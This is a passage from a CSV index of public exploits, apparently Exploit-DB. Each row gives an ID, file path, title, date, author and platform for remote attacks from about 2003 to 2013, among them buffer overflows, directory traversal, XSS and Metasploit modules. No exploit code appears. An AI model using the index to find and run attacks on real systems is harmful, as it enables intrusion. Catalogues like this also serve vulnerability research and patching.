Download Buffer Overrun",2003-12-15,"Oscar Linderholm",multiple,remote, -23441,exploits/linux/remote/23441.c,"Cyrus IMSP Daemon 1.x - Remote Buffer Overflow",2003-12-15,"Carlos Barros",linux,remote, -23446,exploits/windows/remote/23446.txt,"GoAhead Web Server 2.1.x - '.ASP' File Source Code Disclosure",2002-12-17,"Luigi Auriemma",windows,remote, -23461,exploits/windows/remote/23461.txt,"dcam webcam server personal Web server 8.2.5 - Directory Traversal",2003-12-22,"Luigi Auriemma",windows,remote, -23464,exploits/windows/remote/23464.pl,"Opera 7.x - Directory Traversal",2003-11-15,nesumin,windows,remote, -23465,exploits/windows/remote/23465.txt,"Opera Browser 6.0 6 - URI Display Obfuscation",2003-12-23,nesumin,windows,remote, -23472,exploits/windows/remote/23472.rb,"Crystal Reports CrystalPrintControl - ActiveX ServerResourceVersion Property Overflow (Metasploit)",2012-12-18,Metasploit,windows,remote, -23489,exploits/windows/remote/23489.txt,"Sygate Personal Firewall 5.0 - DLL Authentication Bypass",2003-12-29,Aphex,windows,remote, -23490,exploits/windows/remote/23490.txt,"Microsoft IIS 5.0 - Failure To Log Undocumented TRACK Requests",2003-12-29,"Parcifal Aertssen",windows,remote, -23491,exploits/windows/remote/23491.pl,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (1)",2003-12-29,fiNis,windows,remote, -23492,exploits/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (2)",2003-12-29,D4rkGr3y,windows,remote, -23493,exploits/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",windows,remote, -23695,exploits/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass (MS04-013)",2004-02-13,anonymous,windows,remote, -23500,exploits/windows/remote/23500.rb,"InduSoft Web Studio - 'ISSymbol.ocx InternationalSeparator()' Heap Overflow (Metasploit)",2012-12-20,Metasploit,windows,remote, -23502,exploits/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (2)",2003-12-29,"Rosiello Security",windows,remote, -23503,exploits/windows/remote/23503.txt,"NETObserve 2.0 - Authentication Bypass",2003-12-29,"Peter Winter-Smith",windows,remote, -23509,exploits/windows/remote/23509.c,"YaSoft Switch Off 2.3 - 'swnet.dll' Remote Buffer Overflow",2004-01-02,MrNice,windows,remote, -23514,exploits/windows/remote/23514.pl,"Webcam Corp Webcam Watchdog 1.0/1.1/3.63 Web Server - Remote Buffer Overflow",2004-01-04,"Peter Winter-Smith",windows,remote, -23522,exploits/multiple/remote/23522.rb,"NetWin SurgeFTP - Authenticated Admin Command Injection (Metasploit)",2012-12-20,"Spencer McIntyre",multiple,remote, -23527,exploits/hardware/remote/23527.txt,"ZYXEL ZyWALL 10 Management Interface - Cross-Site Scripting",2004-01-06,"Rafel Ivgi",hardware,remote, -23528,exploits/hardware/remote/23528.txt,"Edimax AR-6004 ADSL Router - Management Interface Cross-Site Scripting",2004-01-06,"Rafel Ivgi",hardware,remote, -23529,exploits/windows/remote/23529.txt,"SnapStream PVS Lite 2.0 - Cross-Site Scripting",2004-01-06,"Rafel Ivgi",windows,remote, -23531,exploits/windows/remote/23531.c,"HD Soft Windows FTP Server 1.5/1.6 - 'Username' Format String",2004-01-12,mandragore,windows,remote, -23532,exploits/windows/remote/23532.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb Directory Traversal",2004-01-09,badpack3t,windows,remote, -23533,exploits/windows/remote/23533.txt,"Accipiter DirectServer 6.0 - Remote File Disclosure",2004-01-09,"Mark Bassett",windows,remote, -23541,exploits/multiple/remote/23541.c,"lionmax software www file share pro 2.4x - Multiple Vulnerabilities (1)",2004-01-14,"Luigi Auriemma",multiple,remote, -23542,exploits/multiple/remote/23542.c,"lionmax software www file share pro 2.4x - Multiple Vulnerabilities (2)",2004-01-14,"Luigi Auriemma",multiple,remote, -23544,exploits/windows/remote/23544.txt,"vicomsoft rapidcache server 2.0/2.2.6 - Directory Traversal",2004-01-15,"Peter Winter-Smith",windows,remote, -23545,exploits/hardware/remote/23545.txt,"Whale Communications e-Gap Security Appliance 2.5 - Login Page Source Code Disclosure",2004-01-15,Procheckup,hardware,remote, -23552,exploits/windows/remote/23552.xml,"Sun J2EE/RI 1.4 / Sun JDK 1.4.2 - JDBC Database Insecure Default Policy",2004-01-19,"Marc Schoenefeld",windows,remote, -23555,exploits/windows/remote/23555.txt,"GoAhead Web Server 2.1.x - Directory Management Policy Bypass",2004-01-19,"Luigi Auriemma",windows,remote, -23557,exploits/multiple/remote/23557.txt,"aiptek netcam WebServer 0.93.15 - Directory Traversal",2004-01-20,"Rafel Ivgi The-Insider",multiple,remote, -23559,exploits/windows/remote/23559.txt,"WebTrends Reporting Center 6.1 Management Interface - Full Path Disclosure",2004-01-20,"Oliver Karow",windows,remote, -23560,exploits/windows/remote/23560.txt,"anteco visual technologies ownserver 1.0 - Directory Traversal",2004-01-20,"Rafel Ivgi The-Insider",windows,remote, -23562,exploits/windows/remote/23562.html,"2WIRE HomePortal Series - Directory Traversal",2004-01-20,"Rafel Ivgi The-Insider",windows,remote, -23563,exploits/multiple/remote/23563.txt,"Darkwet Network WebcamXP 1.6.945 - Cross-Site Scripting",2004-01-21,"Rafel Ivgi The-Insider",multiple,remote, -23564,exploits/multiple/remote/23564.txt,"Mephistoles HTTPd 0.6 - Cross-Site Scripting",2004-01-21,"Donato Ferrante",multiple,remote, -23878,exploits/windows/remote/23878.txt,"HP Web Jetadmin 7.5.2456 - Printer Firmware Update Script Arbitrary File Upload",2004-03-24,wirepair,windows,remote, -23877,exploits/windows/remote/23877.txt,"NexGen FTP Server 1.0/2.x - Directory Traversal",2004-03-24,"Ziv Kamir",windows,remote, -23579,exploits/unix/remote/23579.rb,"TWiki MAKETEXT - Remote Command Execution (Metasploit)",2012-12-23,Metasploit,unix,remote, -23580,exploits/unix/remote/23580.rb,"Foswiki MAKETEXT - Remote Command Execution (Metasploit)",2012-12-23,Metasploit,unix,remote, -23582,exploits/cgi/remote/23582.txt,"Acme thttpd 1.9/2.0.x - CGI Test Script Cross-Site Scripting",2004-01-22,"Rafel Ivgi The-Insider",cgi,remote, -23583,exploits/multiple/remote/23583.txt,"Netbus 2.0 Pro - Directory Listings Disclosure / Arbitrary File Upload",2004-01-22,"Rafel Ivgi The-Insider",multiple,remote, -23585,exploits/linux/remote/23585.txt,"Finjan SurfinGate 6.0/7.0 - FHTTP Restart Command Execution",2004-01-23,"David Byrne",linux,remote, -23586,exploits/netware/remote/23586.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - env.bas Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",netware,remote, -23587,exploits/netware/remote/23587.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - snoop.jsp Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",netware,remote, -23588,exploits/netware/remote/23588.txt,"Novell Netware Enterprise Web Server 5.1/6.0 SnoopServlet - Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",netware,remote, -23589,exploits/netware/remote/23589.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-01-23,"Rafel Ivgi The-Insider",netware,remote, -23591,exploits/windows/remote/23591.c,"RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (1)",2004-01-24,mandragore,windows,remote, -23592,exploits/windows/remote/23592.c,"RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (2)",2004-01-25,mslug@safechina.net,windows,remote, -23593,exploits/multiple/remote/23593.txt,"Oracle HTTP Server 8.1.7/9.0.1/9.2 - isqlplus Cross-Site Scripting",2004-01-24,"Rafel Ivgi The-Insider",multiple,remote, -23594,exploits/windows/remote/23594.txt,"tinyserver 1.1 - Directory Traversal",2004-01-24,"Donato Ferrante",windows,remote, -23596,exploits/windows/remote/23596.txt,"TinyServer 1.1 - Cross-Site Scripting",2004-01-24,"Donato Ferrante",windows,remote, -23597,exploits/windows/remote/23597.txt,"borland Web server for corel paradox 1.0 b3 - Directory Traversal",2004-01-24,"Rafel Ivgi The-Insider",windows,remote, -23598,exploits/multiple/remote/23598.txt,"IBM Net.Data 7.0/7.2 - db2www Error Message Cross-Site Scripting",2004-01-26,"Carsten Eiram",multiple,remote, -23600,exploits/multiple/remote/23600.txt,"Herberlin BremsServer 1.2.4 - Cross-Site Scripting",2004-01-26,"Donato Ferrante",multiple,remote, -23694,exploits/windows/remote/23694.rb,"RealPlayer - '.RealMedia' File Handling Buffer Overflow (Metasploit)",2012-12-27,Metasploit,windows,remote, -23601,exploits/multiple/remote/23601.rb,"Netwin SurgeFTP - Remote Command Execution (Metasploit)",2012-12-23,Metasploit,multiple,remote, -23603,exploits/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal",2004-01-26,"Donato Ferrante",windows,remote, -23604,exploits/linux/remote/23604.txt,"Antologic Antolinux 1.0 - Administrative Interface 'NDCR' Remote Command Execution",2004-01-26,"Himeur Nourredine",linux,remote, -23605,exploits/solaris/remote/23605.txt,"Cherokee 0.1.x/0.2.x/0.4.x - Error Page Cross-Site Scripting",2004-01-26,"César Fernández",solaris,remote, -23608,exploits/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack / Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote, -23612,exploits/windows/remote/23612.txt,"BRS Webweaver 1.0.7 - 'ISAPISkeleton.dll' Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote, -23632,exploits/windows/remote/23632.txt,"Crob FTP Server 3.5.1 - Remote Information Disclosure",2004-02-02,"Zero X",windows,remote, -23643,exploits/windows/remote/23643.txt,"Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy (MS04-004)",2004-02-03,"Andreas Sandblad",windows,remote, -23649,exploits/windows/remote/23649.rb,"Microsoft SQL Server - Database Link Crawling Command Execution (Metasploit)",2012-12-25,Metasploit,windows,remote, -23650,exploits/windows/remote/23650.rb,"IBM Lotus Notes Client URL Handler - Command Injection (Metasploit)",2012-12-25,Metasploit,windows,remote, -23651,exploits/php/remote/23651.rb,"WordPress Plugin WP-Property - Arbitrary '.PHP' File Upload (Metasploit)",2012-12-25,Metasploit,php,remote, -23652,exploits/php/remote/23652.rb,"WordPress Plugin Asset-Manager - Arbitrary '.PHP' File Upload (Metasploit)",2012-12-25,Metasploit,php,remote, -23668,exploits/windows/remote/23668.txt,"Microsoft Internet Explorer 5.0.1 - LoadPicture File Enumeration",2004-02-07,Jelmer,windows,remote, -23671,exploits/linux/remote/23671.txt,"Caucho Technology Resin 2.1.12 - Directory Listings Disclosure",2004-02-09,"Wang Yun",linux,remote, -23675,exploits/windows/remote/23675.txt,"Microsoft Windows XP - HCP URI Handler Arbitrary Command Execution",2004-02-09,"Bartosz Kwitkowski",windows,remote, -23678,exploits/windows/remote/23678.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (1)",2004-02-10,"Cheng Peng Su",windows,remote, -23679,exploits/windows/remote/23679.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (2)",2004-02-10,"Cheng Peng Su",windows,remote, -23707,exploits/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",multiple,remote, -23714,exploits/windows/remote/23714.c,"KarjaSoft Sami HTTP Server 1.0.4 - GET Buffer Overflow",2004-02-13,badpack3t,windows,remote, -23717,exploits/windows/remote/23717.txt,"Microsoft Windows XP - Help and Support Center Interface Spoofing",2004-02-17,"Bartosz Kwitkowski",windows,remote, -23721,exploits/hardware/remote/23721.txt,"Linksys WAP55AG 1.0.7 - SNMP Community String Insecure Configuration",2004-02-18,"NN Poster",hardware,remote, -23728,exploits/linux/remote/23728.txt,"Metamail 2.7 - Multiple Buffer Overflow / Format String Handling Vulnerabilities",2004-02-18,"Ulf Harnhammar",linux,remote, -23730,exploits/windows/remote/23730.txt,"AOL Instant Messenger 4.x/5.x - Buddy Icon Predictable File Location",2004-02-19,"Michael Evanchik",windows,remote, -23732,exploits/windows/remote/23732.c,"PSOProxy 0.91 - Remote Buffer Overflow (1)",2004-02-20,PaLbOsA,windows,remote, -23733,exploits/windows/remote/23733.c,"PSOProxy 0.91 - Remote Buffer Overflow (2)",2004-02-20,Li0n7,windows,remote, -23734,exploits/windows/remote/23734.c,"PSOProxy 0.91 - Remote Buffer Overflow (3)",2004-02-20,NoRpiuS,windows,remote, -23735,exploits/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Authenticated Remote Command Execution",2012-12-29,xistence,hardware,remote, -23736,exploits/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W - ActiveX Buffer Overflow (Metasploit)",2012-12-31,Metasploit,windows,remote, -23737,exploits/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow (Metasploit)",2012-12-31,Metasploit,windows,remote, -23740,exploits/linux/remote/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,remote, -23741,exploits/windows/remote/23741.c,"Proxy-Pro Professional GateKeeper 4.7 Web Proxy - Buffer Overrun",2004-02-23,kralor,windows,remote, -23751,exploits/windows/remote/23751.txt,"Apache Cygwin 1.3.x/2.0.x - Directory Traversal",2004-02-24,"Jeremy Bae",windows,remote, -23754,exploits/windows/remote/23754.rb,"Microsoft Internet Explorer - CDwnBindInfo Object Use-After-Free (Metasploit)",2012-12-31,Metasploit,windows,remote, -23756,exploits/multiple/remote/23756.txt,"Seyeon Technology FlexWATCH Server 2.2 - Cross-Site Scripting",2004-02-24,"Rafel Ivgi The-Insider",multiple,remote, -23758,exploits/windows/remote/23758.txt,"GWeb HTTP Server 0.5/0.6 - Directory Traversal",2004-02-24,"Donato Ferrante",windows,remote, -23763,exploits/windows/remote/23763.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (4)",2004-02-26,lion,windows,remote, -23764,exploits/hardware/remote/23764.txt,"Symantec Gateway Security 5400 Series 2.0 - Error Page Cross-Site Scripting",2004-02-26,Soby,hardware,remote, -23766,exploits/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage",2004-02-27,iDefense,windows,remote, -23768,exploits/windows/remote/23768.txt,"Microsoft Internet Explorer 6 - window.open Media Bar Cross-Zone Scripting",2003-09-11,Jelmer,windows,remote, -23771,exploits/linux/remote/23771.pl,"GNU Anubis 3.6.x/3.9.x - Multiple Format String Vulnerabilities",2004-03-01,"Ulf Harnhammar",linux,remote, -23772,exploits/linux/remote/23772.c,"GNU Anubis 3.6.x/3.9.x - 'auth.c auth_ident()' Remote Overflow",2004-03-01,CMN,linux,remote, -23776,exploits/windows/remote/23776.txt,"Software602 602Pro LAN Suite - Web Mail Cross-Site Scripting",2004-03-01,"Rafel Ivgi The-Insider",windows,remote, -23777,exploits/linux/remote/23777.txt,"Squid Proxy 2.4/2.5 - NULL URL Character Unauthorized Access",2004-03-01,"Mitch Adair",linux,remote, -23785,exploits/windows/remote/23785.rb,"Microsoft Internet Explorer - CButton Object Use-After-Free (Metasploit)",2013-01-02,Metasploit,windows,remote, -23790,exploits/windows/remote/23790.html,"Microsoft Internet Explorer 5 - window.open Search Pane Cross-Zone Scripting",2003-09-10,"Liu Die Yu",windows,remote, -23794,exploits/linux/remote/23794.txt,"PWebServer 0.3.x - Directory Traversal",2004-03-08,"Donato Ferrante",linux,remote, -23796,exploits/windows/remote/23796.html,"Microsoft Outlook 2002 - 'Mailto' Quoting Zone Bypass",2004-03-09,shaun2k2,windows,remote, -23800,exploits/osx/remote/23800.txt,"Apple Safari 1.x - Cookie Directory Traversal",2004-03-10,"Corsaire Limited",osx,remote, -23801,exploits/linux/remote/23801.txt,"GNU MyProxy 20030629 - Cross-Site Scripting",2004-03-11,"Donato Ferrante",linux,remote, -23802,exploits/linux/remote/23802.txt,"Pegasi Web Server 0.2.2 - Arbitrary File Access",2004-03-11,"Donato Ferrante",linux,remote, -23803,exploits/linux/remote/23803.txt,"Pegasi Web Server 0.2.2 - Error Page Cross-Site Scripting",2004-03-11,"Donato Ferrante",linux,remote, -23804,exploits/cgi/remote/23804.txt,"cPanel 5/6/7/8/9 - Resetpass Remote Command Execution",2004-03-11,"Arab VieruZ",cgi,remote, -23808,exploits/hardware/remote/23808.txt,"IP3 Networks IP3 NetAccess Appliance - SQL Injection",2004-03-12,"Syam Yanuar",hardware,remote, -23811,exploits/linux/remote/23811.c,"MathoPD 1.x - Remote Buffer Overflow",2003-11-02,aion,linux,remote, -23836,exploits/windows/remote/23836.txt,"IBM Lotus Domino 6/7 - HTTP webadmin.nsf Directory Traversal",2004-03-17,dr_insane,windows,remote, -23837,exploits/windows/remote/23837.txt,"IBM Lotus Domino 6.5.1 - HTTP webadmin.nsf Quick Console Cross-Site Scripting",2004-03-17,dr_insane,windows,remote, -23847,exploits/windows/remote/23847.c,"Internet Security Systems Protocol Analysis Module ICQ - Parsing Buffer Overflow",2004-03-26,Sam,windows,remote, -23848,exploits/linux/remote/23848.txt,"SquidGuard 1.x - NULL URL Character Unauthorized Access",2004-03-19,"Petko Popadiyski",linux,remote, -23855,exploits/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 - Remote Command Execution",2013-01-03,dun,hardware,remote, -23856,exploits/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion (Metasploit)",2013-01-03,Metasploit,php,remote, -23864,exploits/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal",2004-03-22,"Donato Ferrante",linux,remote, -23871,exploits/windows/remote/23871.txt,"Centrinity FirstClass HTTP Server 5/7 - 'TargetName' Cross-Site Scripting",2004-03-22,"Richard Maudsley",windows,remote, -23873,exploits/multiple/remote/23873.c,"Mythic Entertainment Dark Age of Camelot 1.6x - Encryption Key Signing",2004-03-23,"Todd Chapman",multiple,remote, -23879,exploits/windows/remote/23879.txt,"HP Web Jetadmin 7.5.2456 - setinfo.hts Script Directory Traversal",2004-03-24,wirepair,windows,remote, -23880,exploits/windows/remote/23880.txt,"HP Web Jetadmin 7.5.2456 - Arbitrary Command Execution",2004-03-24,wirepair,windows,remote, -23881,exploits/linux/remote/23881.txt,"Emil 2.x - Multiple Buffer Overrun / Format String Vulnerabilities",2004-03-25,"Ulf Harnhammar",linux,remote, -23887,exploits/windows/remote/23887.rb,"Enterasys NetSight - 'nssyslogd.exe' Remote Buffer Overflow (Metasploit)",2013-01-04,Metasploit,windows,remote, -23969,exploits/windows/remote/23969.rb,"IBM Cognos - 'tm1admsd.exe' Remote Overflow (Metasploit)",2013-01-08,Metasploit,windows,remote, -23893,exploits/multiple/remote/23893.txt,"WebCT Campus Edition 3.8/4.x - HTML Injection",2004-03-29,"Simon Boulet",multiple,remote, -23903,exploits/windows/remote/23903.html,"Microsoft Internet Explorer 6 - HTML Form Status Bar Misrepresentation",2004-03-31,http-equiv,windows,remote, -23905,exploits/windows/remote/23905.txt,"ADA IMGSVR 0.4 - Remote Directory Listing",2004-04-01,"Donato Ferrante & Dr_insane",windows,remote, -23906,exploits/windows/remote/23906.txt,"ADA IMGSVR 0.4 - Arbitrary File Download",2004-04-01,"Donato Ferrante",windows,remote, -23909,exploits/windows/remote/23909.txt,"ada imgsvr 0.4 - Directory Traversal",2004-04-05,dr_insane,windows,remote, -23926,exploits/windows/remote/23926.txt,"Mcafee FreeScan CoMcFreeScan Browser - Information Disclosure",2004-04-07,"S G Masood",windows,remote, -23936,exploits/linux/remote/23936.pl,"lcdproc lcdd 0.x/4.x - Multiple Vulnerabilities",2004-04-08,wsxz,linux,remote, -33402,exploits/linux/remote/33402.txt,"Ruby on Rails 2.3.5 - 'protect_from_forgery' Cross-Site Request Forgery",2009-12-14,p0deje,linux,remote, -23987,exploits/cgi/remote/23987.txt,"SurgeLDAP 1.0 - 'User.cgi' Directory Traversal",2004-04-12,dr_insane,cgi,remote, -24012,exploits/windows/remote/24012.html,"WinSCP 3.5.6 - Long URI Handling Memory Corruption",2004-04-16,"Luca Ercoli",windows,remote, -24017,exploits/windows/remote/24017.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)",2013-01-10,sickness,windows,remote, -24018,exploits/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload (Metasploit)",2013-01-10,Metasploit,php,remote, -24019,exploits/multiple/remote/24019.rb,"Ruby on Rails - XML Processor YAML Deserialization Code Execution (Metasploit)",2013-01-10,Metasploit,multiple,remote, -24020,exploits/windows/remote/24020.rb,"Microsoft Internet Explorer - Option Element Use-After-Free (MS11-081) (Metasploit)",2013-01-10,Metasploit,windows,remote, -24021,exploits/windows/remote/24021.rb,"Honeywell Tema Remote Installer - ActiveX Remote Code Execution (Metasploit)",2013-01-10,Metasploit,windows,remote, -24024,exploits/windows/remote/24024.html,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload / Execution",2004-04-19,"Rafel Ivgi The-Insider",windows,remote, -24025,exploits/windows/remote/24025.txt,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Information Disclosure",2004-04-19,"Rafel Ivgi The-Insider",windows,remote, -24028,exploits/windows/remote/24028.pl,"Kinesphere Corporation Exchange POP3 4.0/5.0 - Remote Buffer Overflow",2004-04-20,"securma massine",windows,remote, -24030,exploits/multiple/remote/24030.c,"Multiple Vendor - TCP Sequence Number Approximation (1)",2004-03-05,"Matt Edman",multiple,remote, -24031,exploits/multiple/remote/24031.pl,"Multiple Vendor - TCP Sequence Number Approximation (2)",2004-04-20,"Paul A. Watson",multiple,remote, -24032,exploits/multiple/remote/24032.txt,"Multiple Vendor - TCP Sequence Number Approximation (3)",2004-04-20,"Paul Watson",multiple,remote, -24033,exploits/multiple/remote/24033.pl,"Multiple Vendor - TCP Sequence Number Approximation (4)",2004-04-23,K-sPecial,multiple,remote, -24038,exploits/linux/remote/24038.txt,"Xine 0.9.x and Xine-Lib 1 - Multiple Remote File Overwrite Vulnerabilities",2004-04-22,anonymous,linux,remote, -24040,exploits/multiple/remote/24040.txt,"PISG 0.54 - IRC Nick HTML Injection",2004-04-22,shr3kst3r,multiple,remote, -24041,exploits/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Arbitrary File Overwrite",2004-04-22,"Luigi Auriemma",multiple,remote, -24045,exploits/java/remote/24045.rb,"Java Applet JMX - Remote Code Execution (Metasploit) (1)",2013-01-11,Metasploit,java,remote, -24065,exploits/hardware/remote/24065.java,"Siemens S55 - Cellular Telephone Sms Confirmation Message Bypass",2004-04-27,FtR,hardware,remote, -24067,exploits/unix/remote/24067.c,"LHA 1.x - Remote Buffer Overflow / Directory Traversal",2004-04-30,N4rK07IX,unix,remote, -24069,exploits/windows/remote/24069.html,"Microsoft Internet Explorer 6 - Meta Data Foreign Domain Spoofing",2004-04-30,E.Kellinis,windows,remote, -24076,exploits/windows/remote/24076.txt,"Sambar Server 5.x - Open Proxy / Authentication Bypass",2003-01-30,"David Endler",windows,remote, -24077,exploits/windows/remote/24077.txt,"Business Objects Crystal Reports 9/10 Web Form Viewer - Directory Traversal",2004-05-03,"Imperva Application Defense Center",windows,remote, -24079,exploits/linux/remote/24079.c,"APSIS Pound 1.5 - Remote Format String",2004-05-03,"Nilanjan De",linux,remote, -24084,exploits/multiple/remote/24084.py,"Nagios3 - 'history.cgi' Remote Command Execution",2013-01-13,blasty,multiple,remote, -24093,exploits/linux/remote/24093.c,"Exim Sender 3.35 - Verification Remote Stack Buffer Overrun",2004-05-06,newroot,linux,remote, -24097,exploits/windows/remote/24097.c,"MyWeb HTTP Server 3.3 - GET Buffer Overflow",2004-05-06,badpack3t,windows,remote, -24098,exploits/windows/remote/24098.txt,"Qualcomm Eudora 6.x - Embedded Hyperlink URI Obfuscation",2004-05-08,"Brett Glass",windows,remote, -24101,exploits/windows/remote/24101.txt,"Microsoft Outlook 2003 - Predictable File Location",2004-05-10,http-equiv,windows,remote, -24102,exploits/windows/remote/24102.txt,"Microsoft Internet Explorer 4/5/6 - Embedded Image URI Obfuscation",2004-05-10,http-equiv,windows,remote, -24105,exploits/linux/remote/24105.txt,"National Science Foundation Squid Proxy 2.3 - Internet Access Control Bypass",2004-05-10,"Nuno Costa",linux,remote, -24106,exploits/linux/remote/24106.txt,"Open WebMail 1.x/2.x - Remote Command Execution Variant",2004-05-10,Nullbyte,linux,remote, -24114,exploits/windows/remote/24114.html,"Microsoft Outlook 2003 - Mail Client E-mail Address Verification",2004-05-11,http-equiv,windows,remote, -24115,exploits/hardware/remote/24115.c,"Linksys - DHCP Information Disclosure",2004-05-31,"Jon Hart",hardware,remote, -24116,exploits/windows/remote/24116.txt,"Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary File Creation/Modification",2004-05-13,"Karol Wiesek",windows,remote, -24117,exploits/windows/remote/24117.txt,"Microsoft Internet Explorer 6 - Codebase Double Backslash Local Zone File Execution",2003-11-25,"Liu Die Yu",windows,remote, -24118,exploits/windows/remote/24118.txt,"Microsoft Outlook Express 6.0 - URI Obfuscation",2004-05-13,http-equiv,windows,remote, -24120,exploits/linux/remote/24120.pl,"LHA 1.x - 'extract_one' Multiple Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",linux,remote, -24121,exploits/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote, -24125,exploits/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote, -24129,exploits/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - GET Buffer Overflow",2004-04-23,CoolICE,windows,remote, -24133,exploits/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote, -24136,exploits/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",linux,remote, -24137,exploits/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",multiple,remote, -24140,exploits/hardware/remote/24140.txt,"NETGEAR RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote, -24148,exploits/multiple/remote/24148.txt,"Sun Java System Application Server 7.0/8.0 - Remote Installation Full Path Disclosure",2004-05-27,"Marc Schoenefeld",multiple,remote, -24149,exploits/php/remote/24149.php,"PHP 4/5 - Input/Output Wrapper Remote File Inclusion Function Command Execution",2004-05-27,Slythers,php,remote, -24187,exploits/windows/remote/24187.txt,"Microsoft Internet Explorer 6 - ADODB.Stream Object File Installation",2003-08-23,Jelmer,windows,remote, -24189,exploits/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,multiple,remote, -24159,exploits/linux/remote/24159.rb,"Nagios3 - 'history.cgi' Host Command Execution (Metasploit)",2013-01-16,Metasploit,linux,remote, -24160,exploits/linux/remote/24160.txt,"SquirrelMail 1.x - Email Header HTML Injection",2004-05-31,"Roman Medina",linux,remote, -24161,exploits/windows/remote/24161.txt,"Sambar Server 6.1 Beta 2 - 'show.asp?show' Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote, -24162,exploits/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - 'showperf.asp?title' Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote, -24163,exploits/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote, -24165,exploits/linux/remote/24165.pl,"Firebird 1.0 - Unauthenticated Remote Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote, -24174,exploits/windows/remote/24174.txt,"Microsoft Internet Explorer 6 - URL Local Resource Access",2004-06-06,"Rafel Ivgi The-Insider",windows,remote, -24179,exploits/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure",2004-06-08,"Vickenty Fesunov",linux,remote, -24196,exploits/windows/remote/24196.txt,"Mozilla Browser 1.6/1.7 - URI Obfuscation",2004-06-14,http-equiv,windows,remote, -24205,exploits/linux/remote/24205.txt,"Novell NCP - Unauthenticated Remote Command Execution",2013-01-18,"Gary Nilson",linux,remote, -24230,exploits/hardware/remote/24230.txt,"BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure",2004-06-22,"Konstantin V. Gavrilenko",hardware,remote, -24206,exploits/multiple/remote/24206.rb,"Jenkins CI Script Console - Command Execution (Metasploit)",2013-01-18,"Spencer McIntyre",multiple,remote, -24213,exploits/windows/remote/24213.txt,"Microsoft Internet Explorer 5.0.1 - Wildcard DNS Cross-Site Scripting",2004-06-15,"bitlance winter",windows,remote, -24218,exploits/windows/remote/24218.cpp,"Symantec Enterprise Firewall 7.0/8.0 - DNSD DNS Cache Poisoning",2004-06-15,fryxar,windows,remote, -24219,exploits/windows/remote/24219.txt,"IBM ACPRunner 1.2.5 - ActiveX Control Dangerous Method",2004-06-16,"eEye Digital Security Team",windows,remote, -24220,exploits/windows/remote/24220.html,"IBM EGatherer 2.0 - ActiveX Control Dangerous Method",2004-06-01,"eEye Digital Security Team",windows,remote, -24221,exploits/linux/remote/24221.pl,"Asterisk 